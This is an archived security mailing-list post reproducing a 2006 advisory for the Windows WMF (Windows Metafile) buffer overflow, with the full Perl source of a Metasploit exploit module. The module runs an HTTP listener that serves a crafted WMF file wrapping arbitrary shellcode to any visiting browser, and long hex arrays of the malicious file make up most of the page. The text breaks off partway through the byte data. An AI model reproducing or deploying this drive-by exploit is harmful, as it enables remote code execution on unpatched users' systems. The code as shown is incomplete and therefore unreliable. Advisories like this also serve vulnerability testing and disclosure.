Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[EXPL] Microsoft Windows WMF Buffer Overflow (Exploit Metasploit)

Subject: [EXPL] Microsoft Windows WMF Buffer Overflow (Exploit Metasploit)
Date: 19 Jan 2006 18:15:45 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Microsoft Windows WMF Buffer Overflow (Exploit Metasploit)
------------------------------------------------------------------------


SUMMARY

Microsoft patch for advisory  
<http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx> MS05-53 
contains a buffer overflow that allow attackers to execute arbitrary code, 
the following exploit can be used to determine whether your system is 
vulnerable to the vulnerability or not.

DETAILS

Vulnerable Systems:
 * Microsoft Windows 2003 SP1
 * Microsoft Windows XP SP2
 * Microsoft Windows 2000 SP4 Rollup

Exploit:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_xp_pfv_metafile;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;

my $advanced =
  {
  };

my $info =
  {
 'Name'           => 'Windows XP/2003 Picture and Fax Viewer Metafile 
Overflow',
 'Version'        => '$Revision: 1.2 $',
 'Authors'        =>
   [
  'H D Moore <hdm [at] metasploit.com'
   ],

 'Description'    =>
   Pex::Text::Freeform(qq{
   This module exploits a vulnerability in the Windows Picture and
   Fax Viewer found in Windows XP and 2003. This vulnerability uses
   a corrupt Windows Metafile to execute arbitrary code and was reported 
by
   noemailpls[at]noemail.ziper to the Bugtraq mailing list after
   being discovered in the wild at the following URL:
   http://unionseek[DOT]com/d/t1/wmf_exp.htm
}),

 'Arch'           => [ 'x86' ],
 'OS'             => [ 'win32', 'winxp', 'win2003' ],
 'Priv'           => 0,

 'UserOpts'       =>
   {
  'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
  'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
   },

 'Payload'        =>
   {
  'Space'    => 5081,
  'Keys'     => [ '-ws2ord', '-bind' ],
   },

 'Refs'           =>
   [

   ],

 'DefaultTarget'  => 0,
 'Targets'        =>
   [
  [ 'Automatic - Windows XP / Windows 2003' ]
   ],
 
 'Keys'           => [ 'ie' ],

 'DisclosureDate' => 'Dec 27 2005',
  };

sub new
{
 my $class = shift;
 my $self;

 $self = $class->SUPER::new(
  {
   'Info'     => $info,
   'Advanced' => $advanced,
  },
  @_);

 return $self;
}

sub Exploit
{
 my $self = shift;
 my $server = IO::Socket::INET->new(
  LocalHost => $self->GetVar('HTTPHOST'),
  LocalPort => $self->GetVar('HTTPPORT'),
  ReuseAddr => 1,
  Listen    => 1,
  Proto     => 'tcp');
 my $client;

 # Did the listener create fail?
 if (not defined($server))
 {
  $self->PrintLine("[-] Failed to create local HTTP listener on " . 
$self->GetVar('HTTPPORT'));
  return;
 }

 $self->PrintLine("[*] Waiting for connections to http://"; . 
$self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . 
"/anything.wmf");

 while (defined($client = $server->accept()))
 {
  $self->HandleHttpClient(fd => 
Msf::Socket::Tcp->new_from_socket($client));
 }

 return;
}

sub HandleHttpClient
{
 my $self = shift;
 my ($fd) = @{{@_}}{qw/fd/};
 my $targetIdx = $self->GetVar('TARGET');
 my $target    = $self->Targets->[$targetIdx];
 my $ret       = $target->[1];
 my $shellcode = $self->GetVar('EncodedPayload')->Payload;
 my $content;
 my $rhost;
 my $rport;
 my $content;
 my $targets =
   {
  "Windows XP"     => [   ], # Automatic
  "Windows 2003"   => [   ], # Automatic
   };
 my $target;
 my $os;

 # Read the HTTP command
 my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

 # Read in the HTTP headers
 while (my $line = $fd->RecvLine(10))
 {
  my ($var, $val) = split /: /, $line;

  # Break out if we reach the end of the headers
  last if (not defined($var) or not defined($val));

  if ($var eq 'User-Agent')
  {
   $os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/);
   $os = "Windows XP"   if (!$os and $val =~ /Windows NT 5.1/);
   $os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/);
   $os = "Windows NT"   if (!$os and $val =~ /Windows NT/);
   $os = "Unknown"      if (!$os);
  }
 }

 # Set the remote host information
 ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

 $target = $targets->{$os};

 if (! $target) {
  $self->PrintLine("[*] Unsupported HTTP Client connected from 
$rhost:$rport using $os");
 }

 
 my $content = $self->wmf_head . $shellcode . $self->wmf_foot;
 
 
 $self->PrintLine("[*] HTTP Client connected from $rhost:$rport using $os, 
sending payload...");

 # Transmit the HTTP response
 $fd->Send(
  "HTTP/1.1 200 OK\r\n" .
    "Content-Type: text/plain\r\n" .
    "Content-Length: " . length($content) . "\r\n" .
    "Connection: close\r\n" .
    "\r\n" .
    "$content"
   );

 $fd->Close();
}

# Ripped straight from wmf_exp.wmf
sub wmf_head {
 return
 "\x01\x00\x09\x00\x00\x03\x52\x1f\x00\x00\x06\x00\x3d\x00\x00\x00".
 "\x00\x00\x11\x00\x00\x00\x26\x06\x0f\x00\x18\x00\xff\xff\xff\xff".
 "\xff\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x03\x85\x00".
 "\xd0\x02\x00\x00\x09\x00\x00\x00\x26\x06\x0f\x00\x08\x00\xff\xff".
 "\xff\xff\x02\x00\x00\x00\x17\x00\x00\x00\x26\x06\x0f\x00\x23\x00".
 "\xff\xff\xff\xff\x04\x00\x1b\x00\x54\x4e\x50\x50\x14\x00\x20\x00".
 "\xb8\x00\x32\x06\x00\x00\xff\xff\x4f\x00\x14\x00\x00\x00\x4d\x00".
 "\x69\x00\x00\x00\x0a\x00\x00\x00\x26\x06\x0f\x00\x0a\x00\x54\x4e".
 "\x50\x50\x00\x00\x02\x00\xf4\x03\x09\x00\x00\x00\x26\x06\x0f\x00".
 "\x08\x00\xff\xff\xff\xff\x03\x00\x00\x00\x0f\x00\x00\x00\x26\x06".
 "\x0f\x00\x14\x00\x54\x4e\x50\x50\x04\x00\x0c\x00\x01\x00\x00\x00".
 "\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0b\x02\x00\x00".
 "\x00\x00\x05\x00\x00\x00\x0c\x02\xd0\x02\xc0\x03\x04\x00\x00\x00".
 "\x04\x01\x0d\x00\x07\x00\x00\x00\xfc\x02\x00\x00\x00\x00\x66\x00".
 "\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x09\x00\x00\x00\xfa\x02".
 "\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x22\x00\x04\x00\x00\x00".
 "\x2d\x01\x01\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x09\x00\x00\x00".
 "\x1d\x06\x21\x00\xf0\x00\xd0\x02\xc0\x03\x00\x00\x00\x00\x04\x00".
 "\x00\x00\x2d\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff".
 "\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00".
 "\xf0\x01\x00\x00\x09\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00".
 "\x00\x00\x00\x00\x22\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x10\x00".
 "\x00\x00\x26\x06\x0f\x00\x16\x00\xff\xff\xff\xff\x00\x00\x47\x00".
 "\x00\x00\x8f\x02\x00\x00\x11\x01\x00\x00\xc1\x02\x00\x00\x08\x00".
 "\x00\x00\x26\x06\x0f\x00\x06\x00\xff\xff\xff\xff\x01\x00\x0d\x00".
 "\x00\x00\xfb\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
 "\x00\x01\x17\x00\x00\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00".
 "\x05\x00\x00\x00\x09\x02\x00\x00\x00\x02\x05\x00\x00\x00\x14\x02".
 "\x00\x00\x00\x00\x04\x00\x00\x00\x02\x01\x02\x00\x10\x00\x00\x00".
 "\x26\x06\x09\x00\x16\x00";
}

# Ripped straight from wmf_exp.wmf
sub wmf_foot {
 return
 "\x00\x09\x00\x04\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
 "\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
 "\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
 "\x00\x04\x00\x00\x00\x02\x01\x01\x00\x15\x00\x00\x00\x32\x0a\xa5".
 "\x01\x2a\x00\x09\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x20".
 "\x00\x0a\xfb\x08\x00\x0a\x00\x06\x00\x09\x00\x09\x00\x07\x00\x09".
 "\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x8a\x14\x02\x00\x00\x00\x00\x04\x70\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x19\x00\x00\x00\x32\x0a\xbb\x01\x2a".
 "\x00\x0c\x00\x00\x00\x77\x77\x77\x77\x20\x3d\x20\x77\x77\x77\x77".
 "\x77\x0c\x00\x0c\x00\x07\x00\x0c\x00\x05\x00\x0a\x00\x05\x00\x0c".
 "\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00".
 "\x00\x32\x0a\xbb\x01\xa3\x00\x01\x00\x00\x00\x2d\x00\x06\x00\x04".
 "\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
 "\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
 "\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
 "\x01\x01\x00\x25\x00\x00\x00\x32\x0a\xbb\x01\xa9\x00\x14\x00\x00".
 "\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x77\x20\x05\x00\x0a\x00\x0a\x00\x05\x00\x0a\x00\x05".
 "\x00\x06\x00\x0a\x00\x08\x00\x09\x00\x05\x00\x0a\x00\x08\x00\x0a".
 "\x00\x06\x00\x09\x00\x05\x00\x0a\x00\x08\x00\x05\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\xbe\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x3d\x00\x00\x00\x32\x0a\xd1\x01\x2a\x00\x24\x00\x00\x00\x49".
 "\x20\x77\x77\x77\x77\x77\x20\x42\x20\x3d\x20\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x20\x42\x20\x07\x00\x05\x00\x0b\x00\x0a\x00\x0a\x00\x0a\x00\x09".
 "\x00\x05\x00\x0c\x00\x05\x00\x0b\x00\x05\x00\x05\x00\x0a\x00\x0a".
 "\x00\x05\x00\x0a\x00\x05\x00\x06\x00\x0a\x00\x08\x00\x05\x00\x0a".
 "\x00\x06\x00\x04\x00\x0e\x00\x0b\x00\x05\x00\x0a\x00\x0a\x00\x0a".
 "\x00\x0a\x00\x0a\x00\x04\x00\x0d\x00\x05\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
 "\x00\x00\x00\x32\x0a\xe8\x01\x2a\x00\x01\x00\x00\x00\x49\x00\x07".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x9f\x0a\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xe8\x01\x31\x00\x01".
 "\x00\x00\x00\x2d\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\xb0\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x30\x00\x00\x00\x32".
 "\x0a\xe8\x01\x37\x00\x1b\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x20\x00\x0c\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x05".
 "\x00\x0b\x00\x05\x00\x05\x00\x0a\x00\x0a\x00\x05\x00\x0a\x00\x05".
 "\x00\x06\x00\x0a\x00\x08\x00\x05\x00\x0a\x00\x06\x00\x04\x00\x0c".
 "\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x05\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x32\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x24".
 "\x00\x00\x00\x32\x0a\x06\x02\x2a\x00\x13\x00\x00\x00\x77\x77\x77".
 "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x20".
 "\x00\x07\x22\x0d\x00\x0c\x00\x05\x00\x0b\x00\x05\x00\x05\x00\x0a".
 "\x00\x0a\x00\x05\x00\x0a\x00\x05\x00\x06\x00\x0a\x00\x08\x00\x05".
 "\xe9\x0a\x00\x06\x00\x05\x00\x04\x00\x00\x00\x2e\x7e\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x15\x00\x00\x00\xfb\x02\xe5\xff\x00".
 "\x00\x00\x00\x00\x00\xbc\x02\x00\x00\x00\x00\x00\x40\x00\x00\x54".
 "\x69\x6d\x65\x73\x20\x4e\x65\x77\x20\x52\x6f\x6d\x61\x6e\x00\x00".
 "\x11\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x05".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x00\x02\x01\x01\x00\x15\x00\x00\x00\x32\x0a\x06\x02\xbe\x00\x09".
 "\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x0d\x00\x0f".
 "\x00\x0e\x00\x0e\x00\x09\x00\x0d\x00\x0a\x00\x08\x00\x0a\x00\x04".
 "\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x15".
 "\x00\x00\x00\xfb\x02\xed\xff\x00\x00\x00\x00\x00\x00\xbc\x02\x00".
 "\x00\x00\x00\x00\x40\x00\x00\x54\x69\x6d\x65\x73\x20\x4e\x65\x77".
 "\x20\x52\x6f\x6d\x61\x6e\x00\x00\x11\x04\x00\x00\x00\x2d\x01\x05".
 "\x00\x08\x00\x00\x00\xf0\x01\x03\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x13\x00\x00".
 "\x00\x32\x0a\x06\x02\x2d\x01\x08\x00\x00\x00\x77\x77\x77\x77\x77".
 "\x77\x77\x20\x0a\x00\x08\x00\x0a\x00\x06\x00\x09\x00\x05\x00\x0a".
 "\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x0f\x00\x00\x00\x32\x0a\x1e\x02\x2a".
 "\x00\x05\x00\x00\x00\x77\x77\x77\x20\x3d\x00\x07\x00\x0e\x00\x0d".
 "\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
 "\x83\x59\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
 "\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\xc3\x18".
 "\x00\x04\x00\x00\x00\x02\x57\x01\x00\x18\x00\x00\xf2\x32\x0a\x1e".
 "\x02\x60\x00\x0b\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x77\x77\x00\x05\x00\x0a\x00\x06\x00\x09\x00\x08\x00\x05\x00\x09".
 "\x00\x0a\x00\x0b\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00".
 "\x00\x32\x0a\x1e\x02\xb8\x00\x01\x00\x00\x00\x2d\x00\x06\x00\x04".
 "\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
 "\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
 "\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
 "\x01\x01\x00\x10\x00\x00\x00\xcd\x0a\x1e\x02\xbe\x00\x06\x00\x00".
 "\x00\x31\x20\x77\x77\x77\x77\x09\x00\x05\x00\x0a\x00\x09\x00\x06".
 "\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x1e\x02\xef".
 "\x00\x01\x00\x00\x00\x2d\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x22\x00\x00".
 "\x00\x32\x0a\x1e\x02\xf4\x00\x12\x00\x00\x00\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x20\x08\x00\x0a".
 "\x00\x0a\x00\x09\x00\x09\x00\x08\x00\x06\x00\x05\x00\x0a\x00\x0a".
 "\x00\x05\x00\x09\x00\x0a\x00\x08\x00\x09\x00\x0f\x00\x09\x00\x05".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x00\x02\x01\x01\x00\x1b\x00\x00\x00\x32\x0a\x34\x02\x2a\x00\x0d".
 "\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x00\x07\x00\x0f\x00\x0c\x00\x04\x00\x0b\x00\x05\x00\x05\x00\x0a".
 "\x00\x08\x00\x0a\x00\x05\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x87\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
 "\x00\x00\x00\x32\x0a\x34\x02\x95\x00\x01\x00\x00\xe0\x2d\x00\x06".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x9f\x04\x00\x00\x00\x02\x01\x02".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\xc6\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x00\x02\x01\x01\x00\x24\x00\x00\x00\x32\x0a\x34\x02\x9b\x00\x13".
 "\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x77\x77\x20\x00\x05\x00\x05\x00\x0b\x00\x09\x00\x04".
 "\x00\x0a\x00\x08\x00\x09\x00\x0e\x00\x06\x00\x0a\x00\x05\x00\x06".
 "\x00\x09\x00\x09\x00\x06\x00\xb8\x00\x08\x00\x05\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x12\x00\x00\x00\x32\x0a\x4b\x02\x2a\x00\x07\x00\x00\x00\x4a".
 "\x4e\x4b\x20\x3d\x20\x63\x00\x0a\x00\x0e\x00\x0e\x00\x05\x00\x0a".
 "\x00\x05\x00\x09\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
 "\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
 "\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
 "\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x4b".
 "\x02\x6d\x00\x01\x00\x00\x00\x2d\x00\x05\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x0f".
 "\x00\x00\x00\x32\x0a\x4b\x02\x72\x00\x05\x00\x00\x00\x4a\x75\x6e".
 "\x20\x4e\x00\x0a\x00\x0a\x00\x0a\x00\x05\x00\x0e\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x95\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x09\x00\x00\x00\x32\x0a\x4b\x02\xa3\x00\x01\x00\x00\x00\xe8".
 "\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x7c\x00\x13\x00\x00\x00\x32\x0a\x4b\x02\xa9".
 "\x00\x08\x00\x00\x00\x74\x65\x72\x6d\x69\x6e\x61\x6c\x06\x00\x09".
 "\x00\x08\x00\x0f\x00\x05\x00\x0a\x00\x0a\x00\x05\x00\x04\x00\x00".
 "\x00\xba\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\x07\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x10\x00\x00\x00\x32\x0a\x4b\x02\xf1\x00\x06\x00\x00\x00\x6b".
 "\x69\x74\x61\x73\x65\x0b\x00\x05\x00\x0a\x00\x0a\x00\x07\x00\x09".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
 "\x00\x81\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32\x0a\x61\x02\x2a\x00\x06".
 "\xef\x00\x00\x4d\x41\x50\x4b\x20\x3d\x12\x00\x0d\x00\x0c\x00\x0e".
 "\x00\x05\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
 "\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
 "\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
 "\x00\x04\x00\x00\x00\x02\x01\x01\x00\x12\x00\x00\x00\x32\x0a\x61".
 "\x02\x78\x00\x07\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x0f".
 "\x00\x05\x00\x06\x00\x09\x00\x0a\x00\x09\x00\x0a\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x09\x00\x00\x00\x32\x0a\x61\x02\xb8\x00\x01\x00\x00\x00\x2d".
 "\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x21\x00\x00\x00\x32\x0a\x61\x02\xbe".
 "\x00\x11\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
 "\x77\x77\x77\x77\x77\x77\x00\x09\x00\x24\x00\x06\x00\x05\x00\x09".
 "\x00\x0a\x00\x05\x00\x09\x00\x0a\x00\x05\x00\x0a\x00\x08\x00\x0a".
 "\x00\x06\x00\x09\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x3c\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x7e\x00".
 "\x00\x32\x0a\x61\x02\x49\x01\x06\x00\x00\x00\x77\x77\x77\x77\x77".
 "\x77\x0b\x00\x05\x00\x0a\x7e\x0a\x00\x07\x00\x09\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x04\x00\x00".
 "\x00\x02\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x04\x00\x04\x00\x00".
 "\x00\x2d\x01\x01\x00\x07\x00\x00\x00\x1b\x04\x84\x02\x92\x03\x28".
 "\x00\xc8\x01\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d".
 "\x01\x00\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
